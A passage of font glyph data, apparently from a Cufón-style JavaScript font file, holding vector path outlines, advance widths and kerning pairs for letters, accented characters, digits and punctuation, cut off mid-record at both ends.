52,0,-60,-40,-60,-94v0,-55,8,-94,60,-94xm75,-27v31,-7,16,-78,14,-115v-2,-8,-6,-10,-14,-11v-30,5,-18,61,-18,96v0,17,3,28,18,30","w":149,"k":{"'":16}},{"d":"127,-39r0,39r-101,0r0,-248r97,0r0,38r-54,0r0,60r50,0r0,39r-50,0r0,72r58,0xm78,-277r-30,0r38,-48r32,0"},{"d":"86,-252v66,0,69,59,69,128v0,69,-3,128,-69,128v-64,0,-68,-58,-68,-128v0,-70,4,-128,68,-128xm86,-36v43,-5,20,-84,25,-134v-3,-24,-1,-43,-25,-43v-35,0,-25,50,-25,89v0,39,-9,84,25,88xm73,-325r38,48r-30,0r-40,-48r32,0","w":173},{"d":"87,4v-37,0,-63,-22,-63,-59r0,-193r43,0r0,191v0,14,7,21,22,21v15,0,22,-7,22,-21r0,-191r39,0r0,193v1,38,-26,59,-63,59xm67,-325r38,48r-30,0r-40,-48r32,0","w":174},{"d":"127,-39r0,39r-101,0r0,-248r97,0r0,38r-54,0r0,60r50,0r0,39r-50,0r0,72r58,0xm101,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm46,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17"},{"d":"0,19r0,-19r155,0r0,19r-155,0","w":154},{"d":"117,-232r-59,193r65,0r0,39r-116,0r0,-17r59,-193r-57,0r0,-38r108,0r0,16","w":129,"k":{"O":7,"G":7,"C":7}},{"d":"132,-321v5,38,-36,50,-57,25v-10,-7,-15,-1,-17,11r-20,0v1,-22,8,-39,28,-40v19,-1,41,36,46,4r20,0xm122,-75v-8,-50,-4,-114,-5,-173r36,0r0,248r-35,0r-60,-174v6,53,5,114,5,174r-37,0r0,-248r36,0","w":179},{"d":"22,-134r20,-20r35,36r36,-36r19,20r-35,35r35,36r-19,19r-36,-35r-35,35r-20,-19r36,-36","w":154},{"d":"108,-247v3,46,-66,55,-80,17v-11,-29,8,-59,38,-58v25,1,40,16,42,41xm86,-247v0,-11,-9,-19,-20,-19v-11,0,-20,8,-20,19v0,11,9,20,20,20v11,0,20,-9,20,-20xm8,-49v3,-41,25,-65,73,-61v1,-20,1,-40,-19,-39v-19,1,-34,7,-47,15r0,-38v41,-19,107,-21,107,46v0,42,-3,91,4,126v-21,1,-32,0,-38,-16v-23,35,-84,21,-80,-33xm81,-78v-37,-11,-47,44,-21,51v10,-1,15,-9,21,-15r0,-36","w":141},{"d":"16,-208r0,-29v12,-6,23,-13,43,-11r0,100r14,0r0,27r-57,0r0,-27r14,0r0,-67xm146,-248r27,0r-101,248r-27,0xm197,-51r0,21r-10,0r0,30r-28,0r0,-30r-38,0r0,-16r43,-81r23,0r0,76r10,0xm160,-85v-4,13,-10,24,-16,34r15,0v0,-11,-1,-24,1,-34","w":216},{"d":"129,-57r-26,0r0,-30r-78,0r0,-26r104,0r0,56","w":159},{"d":"43,43v10,7,41,20,43,0v1,-11,-12,-13,-25,-12r11,-40r20,0r-7,24v34,7,26,62,-11,58v-13,-1,-21,-6,-31,-11r0,-19","w":147},{"w":64},{"d":"98,-90v-3,34,8,65,29,35r0,-70v-6,-5,-9,-13,-18,-14v-15,5,-9,27,-11,49xm100,-167v14,0,24,10,32,18v4,-13,14,-17,32,-15v-6,29,-3,71,-3,106v0,14,-1,21,9,22v15,-5,14,-27,15,-55v1,-64,-8,-107,-72,-107v-65,0,-72,43,-72,107v0,64,7,107,72,107v29,0,44,-5,61,-17r0,23v-15,9,-36,13,-61,13v-76,2,-91,-50,-91,-126v0,-76,15,-126,91,-126v76,0,91,50,91,126v1,45,-9,74,-45,77v-12,0,-20,-6,-26,-17v-12,12,-23,18,-33,18v-34,-3,-36,-39,-36,-77v0,-38,2,-77,36,-77","w":219},{"d":"67,-223r-15,18r-30,0r38,-48r15,0r38,48r-31,0xm8,-49v3,-41,25,-65,73,-61v1,-20,1,-40,-19,-39v-19,1,-34,7,-47,15r0,-38v41,-19,107,-21,107,46v0,42,-3,91,4,126v-21,1,-32,0,-38,-16v-23,35,-84,21,-80,-33xm81,-78v-37,-11,-47,44,-21,51v10,-1,15,-9,21,-15r0,-36","w":141},{"d":"72,1v-53,-7,-54,-62,-54,-125v0,-67,1,-125,64,-126v20,0,38,5,51,11r0,47v-11,-7,-26,-15,-43,-15v-36,0,-29,42,-29,83v0,41,-5,79,29,83v18,1,32,-10,43,-16r0,48v-12,4,-26,9,-41,10r-4,14v31,7,28,62,-11,58v-13,-1,-22,-6,-31,-11r0,-19v10,7,41,20,43,0v1,-11,-12,-13,-25,-12","w":144},{"d":"141,-54v2,-47,16,-84,23,-126r34,0r-43,180r-32,0r-23,-124v-5,44,-14,84,-24,124r-31,0r-43,-180r38,0v7,42,19,80,23,126v2,-46,16,-84,23,-126r31,0v8,41,20,80,24,126","w":199,"k":{".":7}},{"d":"35,0r-37,0r58,-248r47,0r58,248r-43,0r-12,-56r-59,0xm98,-94v-8,-37,-17,-74,-21,-116r-22,116r43,0xm105,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm50,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":161},{"d":"75,-184v52,0,59,41,59,94v0,53,-7,94,-59,94v-52,0,-60,-40,-60,-94v0,-55,8,-94,60,-94xm75,-27v31,-7,16,-78,14,-115v-2,-8,-6,-10,-14,-11v-30,5,-18,61,-18,96v0,17,3,28,18,30xm79,-205r-30,0r38,-48r32,0","w":149},{"d":"92,-131v2,-24,-18,-17,-26,-5r-6,7r0,129r-41,0r0,-248r41,0r1,82v29,-33,72,-19,72,35r0,131r-41,0r0,-131","w":150,"k":{"'":16}},{"d":"18,-124v0,-67,1,-125,64,-126v20,0,38,5,51,11r0,47v-11,-7,-26,-15,-43,-15v-36,0,-29,42,-29,83v0,41,-5,79,29,83v18,1,32,-10,43,-16r0,48v-13,6,-31,11,-51,11v-62,-2,-64,-59,-64,-126","w":144},{"d":"131,-199v-19,-15,-65,-25,-65,12v-1,7,-3,17,-3,29v51,-20,83,16,80,78v-3,54,-12,83,-60,84v-77,2,-55,-98,-60,-172v-5,-69,49,-104,108,-72r0,41xm101,-80v0,-33,-8,-63,-38,-44v2,39,-2,68,11,90v25,10,27,-16,27,-46","w":158},{"d":"75,-223r-15,18r-30,0r38,-48r14,0r38,48r-30,0xm90,-117v-1,-18,2,-36,-15,-36v-18,0,-19,14,-19,36r34,0xm76,-184v54,0,54,45,52,98r-72,0v-1,36,1,60,37,54v10,-2,20,-6,30,-12r0,36v-16,5,-30,12,-50,12v-50,-1,-58,-40,-58,-94v0,-54,8,-94,61,-94"},{"d":"16,-248r43,0r-8,88r-27,0","w":74,"k":{"t":-6,"s":4,"T":-7,"S":-4,"A":18}},{"d":"47,-165r-29,13r0,-42v22,-9,37,-25,72,-21r0,176r29,0r0,39r-101,0r0,-39r29,0r0,-126","w":132},{"d":"90,-117v-1,-18,2,-36,-15,-36v-18,0,-19,14,-19,36r34,0xm76,-184v54,0,54,45,52,98r-72,0v-1,36,1,60,37,54v10,-2,20,-6,30,-12r0,36v-16,5,-30,12,-50,12v-50,-1,-58,-40,-58,-94v0,-54,8,-94,61,-94xm69,-253r38,48r-30,0r-40,-48r32,0"},{"d":"58,-49v-2,24,19,17,27,5r5,-7r0,-129r41,0r0,194v9,65,-68,66,-107,46r0,-37v14,8,26,15,45,16v25,2,21,-28,21,-53v-29,33,-73,18,-73,-35r0,-131r41,0r0,131xm102,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm47,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":150},{"d":"109,-211r-75,0r0,-18r75,0r0,18","w":126},{"d":"18,-248r39,0r-7,88r-24,0xm85,-248r39,0r-7,88r-24,0","k":{"T":-7,"A":18}},{"d":"94,0r-42,0r0,-96r-53,-152r44,0r33,101r34,-101r37,0r-53,152r0,96xm82,-277r-30,0r38,-48r32,0","w":146},{"d":"14,-99v0,-15,13,-28,28,-28v15,0,28,13,28,28v0,15,-13,28,-28,28v-15,0,-28,-13,-28,-28","w":87},{"d":"87,-295r-15,18r-31,0r39,-48r14,0r38,48r-30,0xm86,-252v66,0,69,59,69,128v0,69,-3,128,-69,128v-64,0,-68,-58,-68,-128v0,-70,4,-128,68,-128xm86,-36v43,-5,20,-84,25,-134v-3,-24,-1,-43,-25,-43v-35,0,-25,50,-25,89v0,39,-9,84,25,88","w":173},{"d":"139,-113v0,38,-2,81,4,113v-18,1,-31,1,-36,-12v-39,36,-105,5,-93,-61v-1,-31,8,-49,26,-59v-12,-11,-20,-27,-20,-51v0,-70,54,-78,113,-62r0,40v-26,-8,-77,-19,-72,23v-6,49,56,28,95,32r0,37r-17,0xm55,-73v-7,36,26,48,43,26r0,-66v-31,-3,-45,10,-43,40","w":167},{"d":"90,-199v0,35,-14,53,-41,53v-27,0,-41,-18,-41,-53v0,-35,14,-53,41,-53v27,0,41,18,41,53xm66,0r-23,0r101,-248r23,0xm120,-49v0,-35,14,-53,41,-53v27,0,41,18,41,53v0,35,-14,53,-41,53v-27,0,-41,-18,-41,-53xm49,-224v-8,0,-12,9,-12,25v0,16,4,24,12,24v8,0,12,-8,12,-24v0,-16,-4,-25,-12,-25xm161,-25v8,0,12,-8,12,-24v0,-16,-4,-25,-12,-25v-8,0,-12,9,-12,25v0,16,4,24,12,24","w":217},{"d":"69,-182v16,0,30,6,43,9r0,40v-9,-7,-20,-12,-33,-12v-24,0,-23,27,-23,55v0,28,-1,53,23,55v10,0,21,-4,33,-12r0,40v-12,4,-26,9,-43,9v-49,0,-54,-40,-54,-92v0,-52,6,-91,54,-92","w":118,"k":{"'":4}},{"d":"122,-75v-8,-50,-4,-114,-5,-173r36,0r0,248r-35,0r-60,-174v6,53,5,114,5,174r-37,0r0,-248r36,0","w":179},{"d":"88,-295r-15,18r-30,0r38,-48r14,0r39,48r-31,0xm87,4v-37,0,-63,-22,-63,-59r0,-193r43,0r0,191v0,14,7,21,22,21v15,0,22,-7,22,-21r0,-191r39,0r0,193v1,38,-26,59,-63,59","w":174},{"d":"68,-248r0,248r-42,0r0,-248r42,0xm75,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm20,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":93},{"d":"136,-193v-12,-14,-57,-29,-59,5v-1,6,-1,15,-2,25r42,0r0,25r-43,0r0,27r43,0r0,26r-42,0v2,24,1,44,23,46v14,0,29,-11,38,-17r0,48v-13,6,-29,12,-47,12v-48,0,-54,-41,-57,-89r-18,0r0,-26r17,0r0,-27r-17,0r0,-25r18,0v3,-49,9,-88,57,-89v19,0,34,6,47,12r0,47","w":151},{"d":"8,-49v3,-41,25,-65,73,-61v1,-20,1,-40,-19,-39v-19,1,-34,7,-47,15r0,-38v41,-19,107,-21,107,46v0,42,-3,91,4,126v-21,1,-32,0,-38,-16v-23,35,-84,21,-80,-33xm81,-78v-37,-11,-47,44,-21,51v10,-1,15,-9,21,-15r0,-36xm54,-253r38,48r-30,0r-40,-48r32,0","w":141},{"d":"77,-24v0,15,-14,28,-28,28v-14,0,-28,-13,-28,-28v0,-15,14,-29,28,-29v15,0,28,14,28,29xm69,-248r0,171r-41,0r0,-171r41,0","w":101},{"d":"21,-156v0,-15,14,-28,28,-28v14,0,28,13,28,28v0,15,-14,29,-28,29v-15,0,-28,-14,-28,-29xm28,-103r41,0r0,171r-41,0r0,-171","w":101},{"d":"55,-161v14,-21,63,-36,72,-1v11,-11,23,-22,40,-22v30,0,36,22,36,53r0,131r-41,0r0,-131v0,-30,-25,-11,-31,0r0,131r-41,0r0,-131v2,-24,-18,-17,-26,-5r-4,5r0,131r-41,0v-1,-60,4,-127,-4,-180v22,-2,36,2,40,19","w":219,"k":{"'":13}},{"d":"111,-214v-17,-4,-44,-8,-42,15r0,19r42,0r0,32r-42,0r0,148r-41,0r0,-148r-24,0r0,-32r24,0v-9,-61,28,-80,83,-67r0,33","w":105,"k":{"x":11,"w":9,"v":4,"t":9,"i":4,"f":9,".":14,",":18,"'":-14,"\"":-14}},{"d":"-12,34v16,5,35,6,35,-15r0,-199r41,0r0,200v4,47,-34,56,-76,47r0,-33xm18,-228v0,-13,12,-24,25,-24v13,0,24,11,24,24v0,13,-11,25,-24,25v-14,0,-25,-11,-25,-25","w":86},{"d":"58,1v-40,-5,-43,-44,-43,-91v0,-52,6,-91,54,-92v16,0,30,6,43,9r0,40v-9,-7,-20,-12,-33,-12v-24,0,-23,27,-23,55v0,28,-1,53,23,55v10,0,21,-4,33,-12r0,40v-10,3,-21,8,-34,8r-4,14v34,7,26,62,-11,58v-13,-1,-21,-6,-31,-11r0,-19v10,7,41,20,44,0v1,-11,-13,-13,-26,-12","w":118},{"d":"118,-12r-101,-79r0,-16r101,-79r0,38r-64,49r64,49r0,38","w":133},{"d":"2,-180r43,0r22,51r24,-51r37,0r-42,85r44,95r-43,0r-24,-55r-25,55r-38,0r45,-89","w":129,"k":{".":-4}},{"d":"68,-248r0,248r-42,0r0,-248r42,0xm32,-325r38,48r-30,0r-40,-48r32,0","w":93},{"d":"16,-85r0,-28r48,0r0,-51r27,0r0,51r48,0r0,28r-48,0r0,44r-27,0r0,-44r-48,0xm16,-27r123,0r0,27r-123,0r0,-27","w":154},{"d":"79,-252v65,-10,66,87,39,120v15,10,22,34,22,61v-1,50,-14,71,-61,75v-72,7,-76,-104,-39,-136v-27,-33,-25,-130,39,-120xm95,-165v0,-21,6,-53,-16,-53v-22,0,-16,29,-16,53v0,11,5,17,16,18v11,0,15,-7,16,-18xm99,-72v0,-22,1,-42,-20,-42v-27,0,-19,35,-19,62v0,13,5,21,19,21v21,0,20,-20,20,-41","w":158},{"d":"102,-180v0,-24,-9,-35,-34,-32r0,63v24,3,34,-9,34,-31xm84,-248v60,-8,73,79,42,112v50,25,40,144,-32,136r-68,0r0,-248r58,0xm114,-75v0,-29,-14,-42,-46,-37r0,75v32,4,46,-7,46,-38","w":169,"k":{"Y":11,"X":4,"V":5,"'":7}},{"d":"67,-253r38,48r-30,0r-40,-48r32,0","w":126},{"d":"33,-24v0,-15,14,-29,28,-29v15,0,28,14,28,29v0,15,-14,28,-28,28v-14,0,-28,-13,-28,-28xm128,-182v-3,37,-15,61,-47,66r0,39r-41,0r0,-76v27,2,43,-4,45,-29v3,-42,-50,-33,-75,-22r0,-40v55,-17,124,-8,118,62","w":147},{"d":"58,-49v-2,24,19,17,27,5r5,-7r0,-129r41,0v1,60,-4,127,4,180v-22,3,-35,-4,-40,-19v-25,35,-78,30,-78,-30r0,-131r41,0r0,131","w":150,"k":{"'":7}},{"d":"72,-223r-15,18r-31,0r38,-48r15,0r38,48r-31,0xm58,-49v-2,24,19,17,27,5r5,-7r0,-129r41,0v1,60,-4,127,4,180v-22,3,-35,-4,-40,-19v-25,35,-78,30,-78,-30r0,-131r41,0r0,131","w":150},{"d":"74,-295r-15,18r-31,0r39,-48r14,0r38,48r-30,0xm127,-39r0,39r-101,0r0,-248r97,0r0,38r-54,0r0,60r50,0r0,39r-50,0r0,72r58,0"},{"d":"8,-49v3,-41,25,-65,73,-61v1,-20,1,-40,-19,-39v-19,1,-34,7,-47,15r0,-38v41,-19,107,-21,107,46v0,42,-3,91,4,126v-21,1,-32,0,-38,-16v-23,35,-84,21,-80,-33xm81,-78v-37,-11,-47,44,-21,51v10,-1,15,-9,21,-15r0,-36xm94,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm39,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":141},{"d":"62,-32v34,17,31,-23,32,-58r0,-19xm75,-153v-31,5,-16,52,-20,90r34,-80v-2,-7,-6,-9,-14,-10xm118,-166v31,53,28,203,-69,166r-8,18r-19,0r12,-28v-36,-51,-31,-213,69,-168r8,-20r20,0","w":149},{"d":"16,-113r123,0r0,28r-123,0r0,-28xm58,-153v0,-10,8,-19,19,-19v11,0,20,8,20,19v0,11,-9,19,-20,19v-11,0,-19,-9,-19,-19xm58,-45v0,-11,8,-20,19,-20v11,0,20,9,20,20v0,11,-10,19,-20,19v-10,0,-19,-9,-19,-19","w":154},{"d":"66,0r-41,0r0,-148r-19,0r0,-32r60,0r0,180xm39,-205r-30,0r38,-48r32,0","w":88},{"d":"24,-82r0,-34r93,0r0,34r-93,0","w":141},{"d":"75,-184v52,0,59,41,59,94v0,53,-7,94,-59,94v-52,0,-60,-40,-60,-94v0,-55,8,-94,60,-94xm75,-27v31,-7,16,-78,14,-115v-2,-8,-6,-10,-14,-11v-30,5,-18,61,-18,96v0,17,3,28,18,30xm64,-253r38,48r-30,0r-40,-48r32,0","w":149},{"d":"189,-210r-77,0r14,60r59,0r0,39r-50,0r17,72r41,0r0,39r-75,0r-12,-56r-59,0r-12,56r-37,0r58,-248r133,0r0,38xm98,-94v-8,-37,-17,-74,-21,-116r-22,116r43,0","w":208},{"d":"171,-32r-79,-59r0,-16r79,-59r0,32r-39,35r39,35r0,32xm96,-32r-79,-59r0,-16r79,-59r0,32r-39,35r39,35r0,32","w":184},{"d":"165,-148v0,63,-14,103,-75,103v-61,0,-75,-40,-75,-103v0,-63,15,-103,75,-103v60,0,75,40,75,103xm34,-148v0,51,6,85,56,85v50,0,56,-34,56,-85v0,-50,-5,-84,-56,-84v-51,0,-56,34,-56,84xm94,-203v30,-2,36,44,19,60r17,50r-25,0r-15,-43r-5,0r0,43r-23,0r0,-110r32,0xm92,-157v12,-4,9,-29,-7,-24r0,24r7,0","w":180},{"d":"86,-36v43,-5,20,-84,25,-134v-3,-24,-1,-43,-25,-43v-35,0,-25,50,-25,89v0,39,-9,84,25,88xm104,2v-5,30,17,39,40,30r0,34v-47,9,-83,-9,-77,-64v-47,-12,-48,-66,-49,-126v-1,-70,4,-128,68,-128v66,0,69,59,69,128v0,61,-2,115,-51,126","w":173,"k":{"X":4}},{"d":"47,-295r-15,18r-30,0r38,-48r14,0r39,48r-31,0xm68,-248r0,248r-42,0r0,-248r42,0","w":93},{"d":"96,-90v4,-40,-9,-79,-36,-43r0,86v7,5,11,15,22,16v19,-5,11,-33,14,-59xm93,4v-12,-1,-25,-9,-33,-16r0,80r-41,0r0,-198v1,-16,-2,-37,-4,-50v21,-2,36,2,39,18v10,-10,24,-22,39,-22v42,0,44,47,44,94v0,48,-3,90,-44,94","w":151,"k":{"'":16}},{"d":"117,-215v11,114,-60,130,-46,249r-41,0v1,-54,0,-110,25,-142v14,-18,22,-36,21,-68r-72,0r0,-39r113,0","w":133,"k":{"4":11,".":25,",":18}},{"d":"35,0r-37,0r58,-248r47,0r58,248r-43,0r-12,-56r-59,0xm98,-94v-8,-37,-17,-74,-21,-116r-22,116r43,0xm78,-277v-26,0,-42,-16,-42,-42v0,-25,16,-41,42,-41v25,0,39,17,42,41v-2,24,-16,42,-42,42xm98,-319v0,-11,-9,-19,-20,-19v-11,0,-20,8,-20,19v0,11,9,20,20,20v11,0,20,-9,20,-20","w":161},{"d":"105,-174v0,-26,-9,-38,-36,-36r0,73v28,3,37,-10,36,-37xm83,-248v72,-7,82,104,40,137r39,111r-45,0r-31,-98r-17,0r0,98r-43,0r0,-248r57,0","w":170,"k":{"Y":11,"T":7,"'":11}},{"d":"105,-250r23,0r-101,252r-23,0","w":132},{"d":"56,0r-53,-248r43,0r33,190v9,-66,23,-127,35,-190r38,0r-52,248r-44,0","w":155,"k":{"s":13,"o":14,"g":14,"e":14,"d":14,"c":14,"a":11,"A":7,";":7,":":7,".":25,",":25,"'":-7}},{"d":"23,-31r44,0r-25,89r-29,0","w":87,"k":{"'":61,"\"":61}},{"d":"81,-295r-15,18r-30,0r38,-48r14,0r38,48r-30,0xm35,0r-37,0r58,-248r47,0r58,248r-43,0r-12,-56r-59,0xm98,-94v-8,-37,-17,-74,-21,-116r-22,116r43,0","w":161},{"d":"123,-60r21,0r0,32r-21,0r0,62r-41,0r0,-62r-81,0r0,-24r83,-163r39,0r0,155xm82,-60r3,-98v-13,35,-30,66,-46,98r43,0","w":154,"k":{"4":-7}},{"d":"35,0r-37,0r58,-248r47,0r58,248r-43,0r-12,-56r-59,0xm98,-94v-8,-37,-17,-74,-21,-116r-22,116r43,0xm89,-277r-30,0r38,-48r32,0","w":161},{"d":"8,-161r52,-87r23,0r51,87r-40,0r-23,-47r-23,47r-40,0","w":141},{"d":"58,-49v-2,24,19,17,27,5r5,-7r0,-129r41,0v1,60,-4,127,4,180v-22,3,-35,-4,-40,-19v-25,35,-78,30,-78,-30r0,-131r41,0r0,131xm76,-205r-30,0r38,-48r32,0","w":150},{"d":"16,-124v27,-7,42,-19,41,-55v-1,-58,23,-95,74,-97r0,24v-40,0,-46,32,-46,72v0,32,-12,55,-35,65v59,14,7,139,81,137r0,23v-52,-1,-75,-40,-74,-97v1,-36,-16,-47,-41,-55r0,-17","w":133},{"d":"135,0v-22,2,-36,-3,-40,-19v-9,10,-23,22,-37,22r0,65r-41,0r0,-248r41,0r0,131v-2,24,19,17,27,5r5,-7r0,-129r41,0v1,60,-4,127,4,180","w":150},{"d":"82,-81v38,-1,36,-87,-1,-87r-12,0r0,87r13,0xm151,-125v0,53,-25,86,-82,83r0,42r-43,0r0,-248r43,0r0,41v56,-3,82,32,82,82","w":155},{"d":"64,-31v-16,-1,-26,-4,-39,-8r0,-37v23,9,75,25,76,-12v0,-18,-8,-21,-27,-21v-38,0,-57,-16,-57,-56v0,-34,17,-50,47,-52r0,-46r25,0r0,46v12,1,28,4,37,8r0,37v-21,-8,-73,-28,-73,7v0,14,5,18,22,18v38,0,62,18,62,59v-1,33,-17,52,-48,56r0,46r-25,0r0,-45","w":154},{"d":"104,-248r40,0r-49,119r51,129r-45,0r-29,-79r-31,79r-41,0r51,-123r-49,-125r44,0r29,75","w":146,"k":{"S":4,"Q":4,"O":4,"G":4,"C":4,";":-4,":":-4,".":-4,",":-7}},{"d":"22,-201v13,-1,29,4,27,-12v1,-20,-21,-6,-32,-6r0,-27v29,-10,64,-5,60,33v0,11,-3,18,-7,24v19,20,13,69,-26,69v-11,0,-20,-1,-28,-5r0,-29v13,6,36,17,36,-7v0,-19,-14,-15,-30,-15r0,-25","w":97},{"d":"57,-248r35,0r-4,49r46,-19r11,33r-48,12r31,37r-28,20r-25,-40r-26,41r-28,-21r30,-36r-47,-12r11,-33r45,18","w":149},{"d":"133,-40v-10,4,-23,7,-36,8r0,46r-25,0r0,-46v-42,-4,-46,-44,-46,-93v0,-48,4,-87,46,-92r0,-46r25,0r0,46v13,2,25,3,36,7r0,41v-12,-6,-22,-11,-37,-12v-31,-2,-29,26,-29,56v0,31,-3,59,29,57v15,0,26,-5,37,-12r0,40","w":154},{"d":"81,-39v3,-37,-22,-44,-60,-40r0,-37v31,2,58,1,54,-32v6,-40,-41,-33,-64,-23r0,-40v50,-16,113,-5,105,62v-3,24,-5,40,-18,51v18,10,24,27,24,58v0,75,-59,90,-114,69r0,-40v28,13,80,19,73,-28","w":136},{"d":"108,-251v75,0,92,50,91,127v0,76,-15,126,-91,126v-76,0,-91,-50,-91,-126v-1,-77,16,-127,91,-127xm108,-231v-66,0,-72,43,-72,107v0,64,7,107,72,107v65,0,72,-43,72,-107v0,-64,-6,-107,-72,-107xm107,-204v14,0,25,3,34,9r0,34v-14,-11,-46,-22,-43,11v2,23,-10,74,14,74v12,0,19,-7,29,-12r0,35v-12,5,-23,8,-34,8v-40,0,-41,-36,-41,-79v0,-44,1,-79,41,-80","w":216},{"d":"69,0r-43,0r0,-248r95,0r0,38r-52,0r0,60r48,0r0,39r-48,0r0,111","w":131,"k":{"A":2,".":11,",":11,"'":-7,"\"":-7}},{"d":"70,-24v0,15,-14,28,-28,28v-14,0,-28,-13,-28,-28v0,-15,14,-29,28,-29v15,0,28,14,28,29xm70,-148v0,15,-14,28,-28,28v-14,0,-28,-13,-28,-28v0,-15,13,-28,28,-28v15,0,28,13,28,28","w":87},{"d":"132,-160v0,64,-56,76,-75,121r78,0r0,39r-118,0v-10,-77,45,-96,73,-144v11,-48,-46,-34,-73,-19r0,-43v44,-19,115,-20,115,46","w":147},{"d":"139,-199v-15,-13,-63,-31,-62,6r0,45r50,0r0,35r-50,0r0,74r66,0r0,39r-124,0r0,-39r17,0r0,-74r-17,0r0,-35r17,0v-2,-55,-3,-104,54,-104v20,0,36,7,49,12r0,41","w":154},{"d":"134,-321v5,39,-36,49,-58,25v-9,-7,-15,-1,-16,11r-20,0v1,-23,7,-39,27,-40v20,-1,41,36,46,4r21,0xm86,-252v66,0,69,59,69,128v0,69,-3,128,-69,128v-64,0,-68,-58,-68,-128v0,-70,4,-128,68,-128xm86,-36v43,-5,20,-84,25,-134v-3,-24,-1,-43,-25,-43v-35,0,-25,50,-25,89v0,39,-9,84,25,88","w":173},{"d":"16,-85r0,-28r48,0r0,-51r27,0r0,51r48,0r0,28r-48,0r0,51r-27,0r0,-51r-48,0","w":154},{"d":"60,-104v2,28,-9,82,22,70v13,-19,9,-52,10,-91v-16,-11,-33,-2,-32,21xm18,-80v0,-60,24,-98,74,-78v-1,-14,-2,-26,-8,-36r-30,17r0,-30r17,-9v-10,-12,-22,-26,-35,-32v27,0,54,-3,62,16r32,-18r0,29r-17,10v12,25,20,56,20,95v-2,63,2,120,-58,120v-46,0,-57,-31,-57,-84","w":154},{"d":"118,-124v0,-48,-1,-89,-49,-86r0,171v48,3,50,-38,49,-85xm75,-248v72,-1,87,53,87,124v0,71,-16,125,-87,124r-49,0r0,-248r49,0","w":180,"k":{"Z":9,"Y":11,"X":7,"T":7,"A":4,".":14,",":18}},{"d":"129,-123v-1,27,-9,50,-35,51v-24,1,-29,-20,-48,-22v-10,1,-8,6,-11,17r-27,0v2,-28,10,-51,36,-51v22,0,30,19,48,23v9,-2,8,-7,11,-18r26,0"},{"d":"27,-15v22,14,64,25,66,-13v1,-7,2,-17,2,-29v-48,22,-82,-16,-79,-77v3,-53,10,-83,59,-84v79,-2,61,94,61,171v0,46,-13,84,-61,84v-19,0,-35,-5,-48,-11r0,-41xm58,-134v0,33,6,61,37,44v-1,-40,2,-70,-11,-91v-27,-8,-26,17,-26,47","w":158},{"d":"14,-24v0,-15,14,-29,28,-29v15,0,28,14,28,29v0,15,-14,28,-28,28v-14,0,-28,-13,-28,-28","w":87,"k":{"'":58,"\"":58}},{"d":"35,0r-37,0r58,-248r47,0r58,248r-43,0r-12,-56r-59,0xm98,-94v-8,-37,-17,-74,-21,-116r-22,116r43,0","w":161,"k":{"Y":9,"W":7,"V":7,"T":9,"S":4,"'":18,"\"":18}},{"d":"87,-40v5,-43,-30,-42,-69,-40r0,-135r105,0r0,39r-66,0r0,60v54,-4,73,24,72,76v0,49,-15,77,-65,77v-17,0,-35,-4,-46,-8r0,-41v26,15,77,19,69,-28","w":144},{"d":"137,-180v-9,74,-2,166,-4,248r-41,0r0,-80v-8,7,-21,15,-33,16v-42,-4,-44,-47,-44,-94v0,-47,2,-94,44,-94v15,0,30,12,39,22v4,-16,18,-20,39,-18xm56,-90v-4,40,9,79,36,43r0,-86v-7,-5,-11,-15,-22,-16v-19,5,-11,33,-14,59","w":151,"k":{"'":11}},{"d":"16,-208r0,-29v12,-6,23,-13,43,-11r0,100r14,0r0,27r-57,0r0,-27r14,0r0,-67xm146,-248r27,0r-101,248r-27,0xm202,-93v0,31,-24,43,-35,67r37,0r0,26r-65,0v-7,-48,30,-59,36,-93v-5,-17,-22,-4,-36,0r0,-28v26,-12,63,-12,63,28","w":223},{"d":"90,-117v-1,-18,2,-36,-15,-36v-18,0,-19,14,-19,36r34,0xm76,-184v54,0,54,45,52,98r-72,0v-1,36,1,60,37,54v10,-2,20,-6,30,-12r0,36v-16,5,-30,12,-50,12v-50,-1,-58,-40,-58,-94v0,-54,8,-94,61,-94xm103,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm48,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17"},{"d":"59,0r-40,0r0,-248r40,0r-1,138v13,-25,30,-47,45,-70r40,0r-47,68r43,112r-41,0r-28,-76v-16,13,-10,48,-11,76","w":138},{"d":"151,-166v0,53,-24,86,-82,82r0,84r-43,0r0,-248r55,0v49,1,70,34,70,82xm108,-166v0,-28,-8,-48,-39,-44r0,87v32,4,39,-13,39,-43","w":155,"k":{"q":7,"o":7,"g":7,"e":7,"d":7,"c":7,"a":7,"Z":10,"X":6,"J":4,"A":9,".":14,",":14,"'":-4}},{"d":"94,0r-42,0r0,-96r-53,-152r44,0r33,101r34,-101r37,0r-53,152r0,96","w":146,"k":{"z":14,"x":14,"v":11,"u":18,"s":16,"r":11,"q":18,"p":11,"o":22,"n":11,"m":11,"g":22,"e":25,"d":22,"c":22,"a":22,"S":4,"O":5,"G":5,"E":4,"C":5,"A":9,";":7,":":7,".":25,",":25,"'":-7}},{"d":"80,-99r-64,-49r0,-38r101,79r0,16r-101,79r0,-38","w":133},{"d":"127,-39r0,39r-101,0r0,-248r97,0r0,38r-54,0r0,60r50,0r0,39r-50,0r0,72r58,0xm60,-325r38,48r-30,0r-40,-48r32,0"},{"d":"90,-117v-1,-18,2,-36,-15,-36v-18,0,-19,14,